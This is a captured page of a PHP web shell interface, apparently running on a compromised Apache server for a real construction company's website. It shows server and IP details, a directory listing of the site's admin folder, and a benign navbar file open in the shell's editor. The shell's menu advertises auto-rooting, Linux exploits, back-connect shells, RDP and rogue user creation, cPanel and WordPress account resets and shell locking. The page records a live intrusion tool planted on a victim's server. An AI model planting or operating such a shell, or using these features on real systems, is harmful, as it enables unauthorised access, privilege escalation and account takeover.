Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.147.74.133
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2022 /
vrcaconstruction.com /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
2Navbar_Side
[ DIR ]
drwxr-xr-x
DropDownCategory
[ DIR ]
drwxr-xr-x
PageWrapper
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
1First_Head.php
5.04
KB
-rwxr-xr-x
2Nav_BarTop.php
4.05
KB
-rwxr-xr-x
2Navbar_Side.php
2.8
KB
-rwxr-xr-x
3Page_Wrapper.php
1.76
KB
-rwxr-xr-x
4End_Head.php
934
B
-rwxr-xr-x
Article.php
662
B
-rwxr-xr-x
ArticleEdit.php
535
B
-rwxr-xr-x
Home.php
1.14
KB
-rwxr-xr-x
HomeEdit.php
534
B
-rwxr-xr-x
Inviting.php
532
B
-rwxr-xr-x
Inviting_Mapping.php
540
B
-rwxr-xr-x
Job.php
1.48
KB
-rwxr-xr-x
JobEdit.php
814
B
-rwxr-xr-x
Management_Menu.php
1.3
KB
-rwxr-xr-x
Management_Menu_Create_Form.ph...
808
B
-rwxr-xr-x
MemberList.php
534
B
-rwxr-xr-x
OutServices.php
544
B
-rwxr-xr-x
OutServicesEdit.php
539
B
-rwxr-xr-x
Payment.php
932
B
-rwxr-xr-x
PaymentEdit.php
575
B
-rwxr-xr-x
Product.php
820
B
-rwxr-xr-x
ProductCategoryEdit.php
544
B
-rwxr-xr-x
ProductCategoryEdit2.php
545
B
-rwxr-xr-x
ProductEdit.php
535
B
-rwxr-xr-x
Product_Category.php
549
B
-rwxr-xr-x
Product_Category2.php
550
B
-rwxr-xr-x
Register.php
532
B
-rwxr-xr-x
RegisterEdit.php
536
B
-rwxr-xr-x
Schedule.php
714
B
-rwxr-xr-x
ScheduletEdit.php
537
B
-rwxr-xr-x
Setting.php
540
B
-rwxr-xr-x
amphur.php
497
B
-rwxr-xr-x
amphurEdit.php
535
B
-rwxr-xr-x
booking.php
891
B
-rwxr-xr-x
contact.php
582
B
-rwxr-xr-x
contactview.php
539
B
-rwxr-xr-x
index2.php
1.94
KB
-rwxr-xr-x
login.php
1.66
KB
-rwxr-xr-x
order.php
887
B
-rwxr-xr-x
showpage.php
541
B
-rwxr-xr-x
showpageEdit.php
536
B
-rwxr-xr-x
system_payment.php
728
B
-rwxr-xr-x
upload_file.php
1.03
KB
-rwxr-xr-x
upload_image.php
1.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2Nav_BarTop.php
<nav class="navbar navbar-default navbar-fixed-top" role="navigation" id="navbar" style="position: inherit;margin-bottom: 0px;"> <!-- navbar-header --> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".sidebar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="Home.php"> <img src="../model/upload/img/logo/siamwebsite_64x64_W.png" alt="Logo_siamwebsite" /> </a> <div class="navbar-brand" style="color: white;">Web-based Application rampagesost</div> </div> <!-- end navbar-header --> <!-- navbar-top-links --> <ul class="nav navbar-top-links navbar-right"> <!-- main dropdown --> <li class="dropdown"> <a class="dropdown-toggle" data-toggle="dropdown" href="#"> <span class="top-label label label-success">1</span> <i class="fa fa-tasks fa-3x"></i> </a> <!-- dropdown tasks --> <ul class="dropdown-menu dropdown-tasks"> <?PHP $DateNow = date('Y-m-d'); $NumberDay = 365; $NumberDay_Percent = 0; $date1 = new DateTime($DateNow); // YY-m-d $date2 = new DateTime("2019-10-15"); $diff = $date2->diff($date1)->format("%a"); "<br/>"; $NumberDay_Percen = ($diff/$NumberDay)*100; $english_format_number = number_format($NumberDay_Percen, 2, '.', ''); ?> <li> <a href="#"> <div> <p> <strong>Date of Expired Website </strong> <span class="pull-right text-muted"><?=$english_format_number;?>% </span> </p> <div class="progress progress-striped active"> <div class="progress-bar progress-bar-primary" role="progressbar" aria-valuenow="80" aria-valuemin="0" aria-valuemax="100" style="width: <?= $english_format_number;?>%"> <span class="sr-only">100% Complete (danger)</span> </div> </div> </div> </a> </li> </ul> <!-- end dropdown-tasks --> </li> <li class="dropdown"> <a class="dropdown-toggle" data-toggle="dropdown" href="#"> <i class="fa fa-user fa-3x"></i> </a> <!-- dropdown user--> <ul class="dropdown-menu dropdown-user"> <li><a href="Home.php"><i class="fa fa-user fa-fw"></i> Profile</a> </li> <li><a href="Setting.php"><i class="fa fa-gear fa-fw"></i> Setting </a> </li> <li class="divider"></li> <li><a href="Help.php"><i class="fa fa-podcast" aria-hidden="true"></i> Help</a> <li><a href="../model/controller/SignOut.php"><i class="fa fa-sign-out fa-fw"></i> Sign Out </a> </li> </ul> <!-- end dropdown-user --> </li> <!-- end main dropdown --> </ul> <!-- end navbar-top-links --> </nav>
Close